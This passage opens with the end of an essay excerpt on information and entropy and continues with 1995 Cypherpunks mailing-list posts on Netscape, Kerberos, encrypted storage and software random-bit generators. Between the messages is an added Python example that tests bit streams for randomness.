the relationship between information and entropy should be.  In Brillouin's
analysis of Maxwell's Demon, the Demon's information allowed him to sort
molecules, thus decreasing the system's entropy; but this information had
to be paid for by an even greater increase in entropy elsewhere in the
system.  For Brillouin, then, information and entropy are opposites and
should have opposite signs.  He emphasized the inverse connection
between information and entropy by coining "negentropy" (from negative
entropy) as a synonym for information.

To Shannon, an engineer at Bell Laboratories who published a two-part
paper that was to form the basis of modern information theory (1948),
information and entropy were not opposites.  They were identical.  When
Shannon devised a probability function that he identified with information,
he chose to call the quantity calculated by the function the "entropy"
of the message.  Why he made this choice is unclear.  Rumor has it that
von Neumann told Shannon to use the word because "no one knows what entropy
is, so in a debate you will always have the advantage."  One could argue
that von Neumann's comment was only one element and that the choice of
"entropy" was overdetermined, with multiple factors leading to its
conflation with "information."  On a conceptual level, an important
consideration was the similarity between Shannon's equation for
information and Boltzmann's equation for entropy.  Because the two equations
had similar forms, it was tempting to regard the entities they defined
as the same.  On the level of language, entropy was compelling because
it was a term of recognized legitimacy to the concept of information.
On a cultural level, Shannon's choice anticipated the contemporary
insight that proliferating information is associated with the
production of entropy. [...]

Whatever the reasons for Shannon's choice, it is regarded by many
commentators within our scientific tradition as a scandal, for it
led to the (metaphoric) knotting together of concepts that are partly
similar and partly dissimilar.  Typical is K. G. and J. S. Denbigh's
reaction in their careful study of the way the quantity defined by
Shannon's equation differs from thermodynamic entropy.  Recounting the
story about von Neumann's advice, they write that thus, "confusion
entered in and von Neumann had done science a disservice!"  Jeffrey S.
Wicken is even more explicit, calling Shannon's choice "loose language"
that served "the dark god of obfuscation."  "As a result of its
independent lines of development in thermodynamics and information
theory, there are in science today two 'entropies,'" Wicken writes.
"This is one too many.  It is not science's habit to affix the same
name to different concepts.  Shared names suggest shared meanings, and
the connotative field of the old tends inevitably to intrude on the
denotative terrain of the new."

Clearly Wicken's concern is to restore scientific univocality by closing
off the ability of the information-entropy connection to act as a
metaphor rather than a congruence.  Yet at the same time he admits that
shared language creates an inevitable "intrusion" into the "denotative
terrain" of one term by the "connotative field" of another.  The problem
is more scandalous than he recognizes, for whenever a heuristic is
proposed, it necessarily uses "shared names" that cause scientific
denotation to be interpenetrated by cultural connotations.  For what
else is language but "shared names"?  As Wittgenstein has observed,
there are no private languages.  Moreover, the distinction between
denotative and connotative language is itself part of the distinction
between language-as-vehicle and language-as-concept which metaphors,
and particularly self-reflexive metaphors, bring into question.  To
turn Wicken's argument on its head, we might say he recognizes that
metaphors in general, and the information-entropy connection in
particular, directly threaten science's ability to separate ideas from
the language it uses to express them.

In his anxiety to suppress the metaphoric potential of Shannon's choice,
Wicken misses the richly complex and suggestive connections that were
instrumental in enabling a new view of chaos to emerge.  By the simple
device of using "information" and "entropy" as if they were
interchangeable terms, Shannon's choice gave rise to decades of interpretative
commentary that sought to explain why information should be identified
with disorder rather than order.  For the alliance between entropy and
information to be effective, information first had to be divorced from
meaning (a premise made explicit in Shannon's 1948 papers) and had to
be associated instead with novelty.  Recall the random number generator,
mentioned earlier, that produces a tape we can read.  No matter how long
we watch the tape, numbers keep appearing in unpredictable sequence.
From one point of view this situation represents chaos; from another,
maximum information.

Once randomness was understood as maximum information, it was possible
to envision chaos (as Robert Shaw does) as the source of all that is
new in the world.  Wicken is correct in noting that denotative and
connotative fields overlap; in the case of information, the connotation
that "intruded" upon the denotative field of chaos was complexity.
Whereas chaos had traditionally meant simply disorder, complexity
implied a mingling of symmetry with asymmetry, predictable periodicity
with unpredictable variation.  As we have seen, chaotic or complex
systems are disordered in the sense that they are unpredictable, but
they are ordered in the sense that they possess recursive symmetries
that almost, but not quite, replicate themselves over time.  The
metaphoric joining of entropy and information was instrumental in
bringing about these developments, for it allowed complexity to be
seen as rich in information rather than deficient in order.

Sources cited:

K. G. Denbigh and J. S. Denbigh, _Entropy in Relation to Incomplete
Knowledge_ (Cambridge University Press, 1985)
                                             
Jeffrey S. Wicken, "Entropy and Information:  Suggestions for a
Common Language."  Philosophy of Science 54:176-193  (1987)
==================================================================

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 13:28:33 PDT
To: paquin@netscape.com (Tom Paquin)
Subject: Re: Netscape for Linux?
In-Reply-To: <3064BDFB.717F@netscape.com>
Message-ID: <199509242006.PAA02258@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, 
> 
> I have no current plans to alter our treatment of Linux.  It is not now,
> nor has it ever been, a supported platform.  We do build for it,
> and some people are happy about that.

Does this mean that a Linux version of Netscape will no longer be 
available, or that it *will* be available but unsupported?

> I have not constructed a business case which would cause Netscape
> to begin support for Linux versions of the Navigator.  Right now, I'm 
> not sure that making a point of this would do what you want.

That all depends on what you mean by "support".  If you mean "we will no 
longer make Netscape available for the Linux platform", that's not 
support.  If you mean "we will no longer respond to bug reports for 
Netscape on this platform" then that's discontinuing support.

Please be more specific in your postings?

As a project manager and developer, I have constructed many a business 
case for the development and/or support for products - such a case could 
easily be made for Linux support for Netscape, irrespective of what you 
mean by "support".
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGW6JSS9AwzY9LDxAQElggP9Gy4h5OYkfQqtE0yi4K8rng1C3G/vgr0S
EOfUdFaiw8pewcjgxe4ZqtDyxAeeRGgEYjmAQLA5739xjExCGL45O4OnYMopGDzd
Sfmi557I/qJib1utfE51wkUjqyxutTceb4UDUmUS0TOs/kMCf6DXTvNePRLxVtm4
rW1C9BfDClk=
=kj39
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 24 Sep 95 12:28:42 PDT
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: macworld crypto articles
In-Reply-To: <199509241745.NAA20271@toast.ai.mit.edu>
Message-ID: <199509241924.PAA18525@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


| For the next version, include PGP free with every version of Quicken,
| and have Quicken just "call" PGP.
| 
| Of course, users can encrypt their files now with PGP.  Is there an
| Intuit bboard where someone could post instructions?

	Of course, it would be *much* easier to store Quicken + data
files on an encrypted filesystem (Cryptdisk or SFS).  To start
quicken, the user starts Cryptdisk, runs Quicken on his encrypted
files (now transparently available), and then quits.  Cryptdisk
disappears 5 minutes later.

	Thus, Intuit isn't putting crypto calls which might be illegal
into their code.  They maintain a single code base, a single version
in the warehouses, and continue to lobby Congress to change the laws.

	(Quicken gets stored on the encrypted area so that it won't
start up and say 'where are my data files?')

	Naturally, this works with programs other than Quicken.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Sun, 24 Sep 95 13:45:22 PDT
To: wb8foz@nrk.com
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <199509232229.SAA00612@nrk.com>
Message-ID: <199509242029.PAA02731@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> As a hardware type, I'd prefer a diode noise generator over a
> radioactivity detector. I'd hate for the Fort to be tempted to fudge the
> latter's output by flooding my house from a black helicopter...

No, they'll just flood it with RF and force your diode to act as a 
detector - then they can feed you anything they like ;)

I learned the hard way - keep the transmitters away from a reverse-biased 
diode acting as a noise generator.  Only until I examined the output did 
I realize it wasn't random.  I fixed it, though, by looking at the output
and testing its randomness.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGW/mSS9AwzY9LDxAQGc4gQAjwszSdrT188RrvbTnp9ywwJ99ppixEef
V9m59O169LIh4YwIejicJbO7/zC5t99gs15ZnbTWXZim8r+04XrR3AFyRnQFTDfJ
WmYmW6gHWR40xBxgVMFUydz9TsZqCxGb+iVQRTeteodgMr6x+zbJ0qa8FWy4UNLr
iYfFbjH+okg=
=Qv+f
-----END PGP SIGNATURE-----
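
An added example, not part of the message above or of the thread: one way to carry out the "looking at the output and testing its randomness" step in Python. The bit streams are constructed software models (thresholded Gaussian noise, with and without a period-16 carrier added to stand in for a nearby transmitter), and every function name and the threshold of 5 are assumptions of this example.

```python
import math
import random

Z_LIMIT = 5.0   # assumed alarm threshold; leaves margin when 64 lags are scanned
MAX_LAG = 64    # assumed scan depth, in bits


def monobit_z(bits):
    """Frequency test: z-score of the ones count, ~N(0,1) for a fair source."""
    n = len(bits)
    return (2 * sum(bits) - n) / math.sqrt(n)


def worst_lag(bits, max_lag=MAX_LAG):
    """Compare the stream with itself shifted by 1..max_lag bits.

    For independent fair bits the number of agreements at a given lag is
    Binomial(m, 1/2), so its z-score is ~N(0,1).  A periodic signal leaking
    into the sampler produces a large |z| at lags tied to its period.
    Returns (lag, z) for the lag with the largest |z|.
    """
    n = len(bits)
    best_lag, best_z = 0, 0.0
    for lag in range(1, max_lag + 1):
        m = n - lag
        agree = sum(1 for i in range(m) if bits[i] == bits[i + lag])
        z = (2 * agree - m) / math.sqrt(m)
        if abs(z) > abs(best_z):
            best_lag, best_z = lag, z
    return best_lag, best_z


def assess(bits):
    """Run both checks and return a small report dictionary."""
    mz = monobit_z(bits)
    lag, lz = worst_lag(bits)
    report = {
        "monobit_z": mz,
        "worst_lag": lag,
        "worst_lag_z": lz,
        "balanced": abs(mz) < Z_LIMIT,
        "independent": abs(lz) < Z_LIMIT,
    }
    report["usable"] = report["balanced"] and report["independent"]
    return report


def simulated_noise_bits(n_bits, seed, carrier_amplitude=0.0, carrier_period=16):
    """Constructed model of a comparator sampling a noise diode.

    carrier_amplitude > 0 adds a sine wave (in units of the noise sigma)
    before thresholding, modelling RF pickup.  This is a simulation written
    for this example, not a capture from real hardware.
    """
    rng = random.Random(seed)
    bits = []
    for i in range(n_bits):
        v = rng.gauss(0.0, 1.0)
        v += carrier_amplitude * math.sin(2 * math.pi * i / carrier_period)
        bits.append(1 if v > 0 else 0)
    return bits


if __name__ == "__main__":
    quiet = assess(simulated_noise_bits(32768, seed=1995))
    noisy = assess(simulated_noise_bits(32768, seed=1996, carrier_amplitude=1.0))
    for name, rep in (("quiet bench", quiet), ("near transmitter", noisy)):
        print(f"{name:17s} monobit z={rep['monobit_z']:+6.2f}  "
              f"worst lag={rep['worst_lag']:2d} z={rep['worst_lag_z']:+7.2f}  "
              f"usable={rep['usable']}")
```

The contaminated stream still has a balanced count of ones and zeros, so a frequency check alone accepts it; only the lag scan rejects it.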



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: beckman@cs.hope.edu (Peter Beckman)
Date: Sun, 24 Sep 95 12:46:03 PDT
To: cypherpunks@toad.com
Subject: Kerberos
Message-ID: <9509241945.AA07710@atlantis.cs.hope.edu>
MIME-Version: 1.0
Content-Type: text/plain


We are studying kerberos, the security system implemented by MIT's Athena network.
Has anyone started, considered, imagined or completed any similar security 
systems, preferably using public key cryptography (as opposed to a single 56-bit
DES key)?  

Please mail any responses to beckman@cs.hope.edu.
-- 
Peter Beckman
Hope College              
beckman@cs.hope.edu           
http://www.cs.hope.edu/~beckman/   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Sun, 24 Sep 95 13:32:59 PDT
To: cypherpunks@toad.com
Subject: Re: Kerberos
In-Reply-To: <9509241945.AA07710@atlantis.cs.hope.edu>
Message-ID: <199509242029.QAA26489@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 24, 15:45, Peter Beckman sent the following to the NSA's mail
archives:
> Subject: Kerberos
|| We are studying kerberos, the security system implemented by MIT's
|| Athena network.
|| Has anyone started, considered, imagined or completed any similar
|| security systems, preferably using public key cryptography (as opposed
|| to a single 56-bit DES key)?
||

The Open Software Foundation's Distributed Computing Environment has the
concept of a central security registry (which is currently based on
Kerberos).  I haven't delved too deeply into them, but the OSF website has
some DCE RFCs about adding public key capabilities to the registry.  They
should be off the OSF home page somewhere at <http://www.osf.org>.

	David

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Sun, 24 Sep 95 13:45:04 PDT
To: cypherpunks@toad.com
Subject: Piggybacking
Message-ID: <199509242044.QAA15210@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



In article <444bp8$sd4@life.ai.mit.edu> Adam writes:
>	Naturally, this works with programs other than Quicken.

By leveraging on the popularity of Quicken and people's insecurities
about their financial data cypherpunks might be able to spread PGP and
SecureDrive technology more rapidly.

If I were a marketing manager at a startup selling SecureDrive, for
example, I'd suggest trying to exploit the above by selling my product
as "QuickxxSecure" which would install after Quicken, make the secure
drive, move quicken there, etc.  It would then sell in a box with a
graphical design (e.g. white stripe on red box, to blend nicely with
Intuit's red on white) that Egghead would want to put it on the shelf
right next to Quicken.

Cypherpunks with a crypto-anarchic agenda might "package" shareware in
a way that would exploit the same principles.  Surely, a bigger market
than people using EMACS RMAIL. 

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: donner@ny.ubs.com (Marc Donner)
Date: Sun, 24 Sep 95 14:11:52 PDT
To: cypherpunks@toad.com
Subject: change of address notice for Marc Donner
Message-ID: <9509242111.AA21917@ikura.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear colleague, friend, or correspondent,

My new business address is:

   Marc Donner
   Union Bank of Switzerland
   299 Park Avenue
   New York, NY 10171

   212-821-6229

You can send me email at:

   donner@ubss.com

The destination list for this mail is gleaned from an automated
analysis of many megabytes of mail that I have accumulated over the
last three years.  In some cases you are receiving this not because we
are acquaintances or correspondents but because you were a recipient of
some piece of mail that I also received and kept.  If so, I apologize
for the intrusion.  I have pruned the list extensively, but some email
IDs are sufficiently opaque that I cannot reliably identify the person
at the other end.

Marc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 24 Sep 95 14:21:26 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: "Going after Netscape"
In-Reply-To: <199509232003.QAA11668@book.hks.net>
Message-ID: <199509242121.RAA08234@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> >> So, keep on "attacking" Netscape (kudos to Ray, by the way,
> >> though I've seen Netscape bomb on certain sites, as with the
> >> Cypherpunks archive site, as several of us noted a few months
> >> ago...probably a different problem, but indicative that Netscape
> >> can be corrupted). But let's be careful not to convey any flavor
> >> of this being a vendetta.
> >
> >I agree. The goal is not to kill Netscape but to make the net
> >secure.
> 
> Absolutely. We aren't on a vendetta. We want to make the net secure for
> privacy.

Agreed. My main purpose in harassing Netscape is that I have to live
with customers who insist on using it and I want them to be safe. If
that means having to attack it enough that the press starts
noticing and management starts paying attention as a result, so be it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 24 Sep 95 17:38:13 PDT
To: cypherpunks@toad.com
Subject: Netscape giving away T-shirts?
Message-ID: <199509250033.RAA28349@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My ex-gf just told me on the phone that her boss mentioned
that Netscape was giving away T-shirts to people who found holes.
Apparently her boss saw this on the news. Interesting. ;-)

	(For the over-stressed and/or humor-impaired: I'm not implying
that netscape is giving away t-shirts, just commenting on the accuracy
of the media.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Sun, 24 Sep 95 15:09:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape for Linux?
In-Reply-To: <199509240243.WAA00266@hoopsnake.cjs.net>
Message-ID: <m0swzFk-000xhVC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that Christopher J. Shaulis wrote:

[snipped]
> You have also turned numerous other attempts by various people to buy
> both quantities of navigators and server software for Linux.
> 
> It seems to me that you folks are going out of your way to deny the
> fact that the Linux market exists. I think that it's because you are
> embarrassed that all these people with a $20 operating system are
> throwing money at you while all the folks with $10K operating systems
> aren't talking to you at all. 
> 
> While you may WANT to have all your sales be for OSF/1 machines or
> solaris, but refusing to support Linux and ignoring the demand for
> your products by the Linux community just because you don't think it
> would sound as impressive, is actually quite childish and doesn't make
> any financial sense.
> 
> Christopher

You tell'em Christopher! 

I have turned on quite a few of my friends to Linux. 
Some are Engineers and Programmers in businesses that would love to add
Netscape navigator and server. Hell, I would too.

Screw 'em. If they want to be the de facto standard for *some* OS's but
not all, someone else will come along and fill in the gap.
Besides, they already made the point that they don't want to make money
so why change the status quo. All the more reason to show the weaknesses
of the product before others get sucked in.
I'll stick to TkWWW and Lynx thank you.

- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAgUBMGXXKLbmxeO+s+1xAQF7BwP9GrZe0+DULZegVjPJB7iiLagq8dnY3QLs
J26v2pARiZyyLBZgpBgzenXv8I0nwAL4UnDREWnOOunC3RdM0o5+ROM34tSnhdfM
4T4xEUXHp2CSI98VAkhSqKgnWZEACSeDAcx2gT7jGneAhRPO/VCQkZfz3SquRiHO
4RumiNsnInA=
=TuK+
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 24 Sep 95 18:25:28 PDT
To: cypherpunks@toad.com
Subject: Important consequence of existence of compromised Netscape certificates
In-Reply-To: <199509242121.RAA08234@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950924182101.12733D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


There's one very important side-effect of the existence of a large number 
of compromised certificates accepted by navigator: the upgraded clients 
must either do CRL processing, or the roots used to sign all possibly 
compromised keys *must*  be rejected by the fixed navigator. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Sun, 24 Sep 95 18:28:23 PDT
To: steven ryan <sryan@reading.com>
Subject: Re: Crypto in Wired
Message-ID: <v01530500ac8bc31dd0aa@[199.171.88.78]>
MIME-Version: 1.0
Content-Type: text/plain


>Good issue of Wired this month (10/95)
>
>Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone
>with an indictment hanging over his head Zimmermann says "... I am a
>cryptographer. This is what I do".

You need the full quote to get the real effect:

<<Why is Zimmermann giving away voice-crypto when the feds are still
dangling an indictment over his head? "Because it's still legal for
Americans to hold a private conversation," he says. "And because I'm a
cryptographer. This is what I do.">>

That is a remarkably concise, intelligent, informative, unequivocal, savvy,
and personal statement. Hats off to PZ (or whoever told him to say that).



-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 24 Sep 95 15:53:56 PDT
To: Richard Martin <rmartin@aw.sgi.com>
Subject: Re: `Random' seed.
In-Reply-To: <9509200915.ZM14792@glacius.alias.com>
Message-ID: <9509242252.AA03400@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    From: Richard Martin <rmartin@aw.sgi.com>
    Date: Wed, 20 Sep 1995 09:15:49 -0400

    Vaporware which I heard around CFP '95, and have been sort of
    wondering about ever since...

    Some one told me that some one else [possibly Matt Blaze] had been
    looking at how much randomness could be got by forking two child
    processes which would just run as asynchronous clocks: whenever
    the parent program needs a little `random' bit, it queries both
    and gives (clock(A) + clock(B) % 2) or something.

I've played around with something that Matt posted here a while back
which seems to use the same idea.  Matt suggested that this appears to
emit one random bit per second.  I've done some very lightweight
analysis and haven't seen anything to suggest that the output is not
random, but I wouldn't make any bets based on what I've done.

FWIW, I discussed this code briefly with an engineer at Netscape a
while back . . . .

			Rick

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
/* -*- Mode: C -*- */

/*********************************************************************

This is from a message on the Cypherpunks mailing list:

 Posted-Date: Fri, 20 Jan 95 03:36:17 -0500
 Message-Id: <9501200836.AA19977@merckx.info.att.com>
 To: cypherpunks@toad.com
 Subject: Re: Threats in real life - what are we worried about? 
 Date: Fri, 20 Jan 95 03:36:17 -0500
 From: Matt Blaze <mab@research.att.com>

*********************************************************************/

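#include <stdio.h>
#include <signal.h>
#include <unistd.h>	/* alarm() */

/* volatile: incremented in main(), sampled from the signal handler;
   unsigned so that wrap-around is well defined */
volatile unsigned count=0;

/* SIGALRM handler: re-arm the one-second alarm, emit the counter's low bit */
void printbit(int sig)
{
	(void)sig;
	signal(SIGALRM,printbit);
	alarm(1);
	printf("%1u",count&01);
	fflush(stdout);
}

int main(void)
{
	signal(SIGALRM,printbit);
	alarm(1);
	while (1)
		count++;	/* free-running counter between alarms */
}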

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGXhPZNR+/jb2ZlNAQEkdgQAlVBgpN8LLeb9TM0dhy1Bx7KXfHCiIqV6
UoLRm/hoEzsiOnGbJeNlx2n1dyxdmti/Zvacnsi2CAKHhJGAaARcQGy+hWc6uS3v
nbOqOoFkvRlWYyYV6QLgvKckYM+tbYBvrjQgQ/XivpoPQPbzyRI6cW4soLuJ7fpu
xug5C8yYc8A=
=dT9a
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bret@bjohns.win.net (Bret A. Johnson)
Date: Sun, 24 Sep 95 16:32:56 PDT
To: paquin@netscape.com (Tom Paquin)
Subject: Re: Netscape for Linux?
Message-ID: <1895@bjohns.win.net>
MIME-Version: 1.0
Content-Type: text/plain


 
>> > And the sad part is that now that they have announced that they are
>> > dropping their unofficial Linux support, 
>> 
>> I have no current plans to alter our treatment of Linux.  It is not now,
>> nor has it ever been, a supported platform.  We do build for it,
>> and some people are happy about that.
>>
>> I have not constructed a business case which would cause Netscape
>> to begin support for Linux versions of the Navigator.  Right now, I'm 
>> not sure that making a point of this would do what you want.
>
>I'll say some people are happy about it. 
>
>You just recently turned down an order for 230 copies of the netscape
>navigator for Linux, and as you folks aren't making any money, you can
>only wonder why.
>
>You have also turned numerous other attempts by various people to buy
>both quantities of navigators and server software for Linux.
>
>It seems to me that you folks are going out of your way to deny the
>fact that the Linux market exists. I think that it's because you are
>embarrassed that all these people with a $20 operating system are
>throwing money at you while all the folks with $10K operating systems
>aren't talking to you at all. 

That is ok! I just called their "Sales" dept. and asked for some info.
to be sent to me on their servers.  I got 5 copies of what is on the
WEB page. I could have done that.  I asked him for prices and told him
this was to present to a group of Marketing and Bus. types for a
community system to bring Internet access to a whole county that does
not have it now..

BTW, the system will be running on Suns and SGI's.....

Oh well..

I thought they would do better than this. So far, they're no better than
Sun at customer service...

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Sun, 24 Sep 95 16:28:14 PDT
To: cypherpunks@toad.com (C'Punk List)
Subject: Snake Oil (was: macworld crypto article)
In-Reply-To: <v01530501ac8b23d65a53@[166.84.250.21]>
Message-ID: <199509242327.TAA06477@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dave Mandl wrote about some lame Mac crypto thing...
[..]
> Yup, pretty amazing.  I only skimmed the article, but I believe that out of
> all the programs he tried, there was only one whose crypto he couldn't
> crack.  I found it all a little hard to believe.  I mean, even if they used
> the most obsolete algorithm, wouldn't you have to know _something_ about
> cryptanalysis to crack it?  Are these vendors just putting a "this file is
> locked with this such and such a password" string at the front of the file,
> or what?

[..]

Sounds like it's time for a Snake-Oil FAQ...

Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steven ryan <sryan@reading.com>
Date: Sun, 24 Sep 95 16:59:54 PDT
To: cypherpunks@toad.com
Subject: Crypto in Wired
Message-ID: <199509250000.UAA10758@zork.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Good issue of Wired this month (10/95)

Vic Sussman has a half page on PGPfone. Asked why he's giving away PGPfone
with an indictment hanging over his head Zimmermann says "... I am a
cryptographer. This is what I do".

Banking with First Virtual by Andrew Leonard

Anonymous Speech by Tom Bell

Data Dicks by John Whalen
 Did you know you can recover data on magnetic media that's been written
over up to nine times? These guys do - for a living.

Wanna Bet by Evan I Schwartz
 Guess what's going to be the next killer app on the net.

Steven
Steven Ryan
sryan@reading.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Freedom Remailer <mixmaster@gondolin.org>
Date: Sun, 24 Sep 95 18:14:30 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509250105.UAA11700@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text/plain


Post: Spy Agency Hoards Secret $1 Billion

WASHINGTON (AP) - The super secret agency that manages the nation's spy satellite program has built up unspent funds totaling more than $1 billion
without informing Congress or even its supervisors at the Pentagon and CIA, according to a published report.

The Washington Post cited unidentified Capitol Hill sources in Sunday editions as saying the ability of the National Reconnaissance Organization to put
away so much money from its classified multibillion-dollar budget reaffirmed concerns that intelligence agencies sometimes use their secret status to avoid
accountability.

The Post said the funds, called a "pot of gold" by one Senate aide, were discovered after the Senate intelligence committee raised questions more than a year
ago about a $300 million new headquarters building the agency was building in suburban Virginia.

The committee determined that the agency, not generally known to Congress, was using base operating funds it already had without seeking a specific
appropriation for the building.

The pool of unspent money accumulated as a result of NRO's practice of having Congress pay in advance for multiyear, billion-dollar-plus satellite
programs, the Post quoted CIA Director John Deutch as saying in an interview. Agency managers let incoming funds pile up when spending on contracts took
place at a slower pace than planned.

Although he said a CIA inquiry found nothing illegal about how the NRO handled the money, Deutch told the Post he put a new chief financial officer in at
the agency and ordered a "separate budget scrub" of all its programs.

NRO's funding is part of the Pentagon budget, but many of the agency's intelligence programs are under CIA supervision.

The Post said one congressional aide put the total of unspent funds as high as $1.7 billion, but that others said it could turn out to be less than $1 billion.

It said Deutch declined to put a figure on the unspent money.

Story Number: 00598 Story Date: 9/23/95

This material may not be redistributed. Copyright 1995. The Associated Press. All rights reserved. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 24 Sep 95 17:05:32 PDT
To: cypherpunks@toad.com
Subject: Re: `Random' seed.
Message-ID: <199509250016.UAA19204@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


> I've played around with something that Matt posted here a while back
> which seems to use the same idea.  Matt suggested that this appears to
> emit one random bit per second.  I've done some very lightweight
> analysis and haven't seen anything to suggest that the output is not
> random, but I wouldn't make any bets based on what I've done.

Here's my current favorite quick-and-dirty true-random-in-software generator.
Use at own risk and read the comments carefully...

-matt
===================cut here===========================
/*
 *	Physically random numbers (very nearly uniform)
 *	D. P. Mitchell 
 *	Modified by Matt Blaze 2/95
 */
/*
 * The authors of this software are Don Mitchell and Matt Blaze.
 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software may be subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
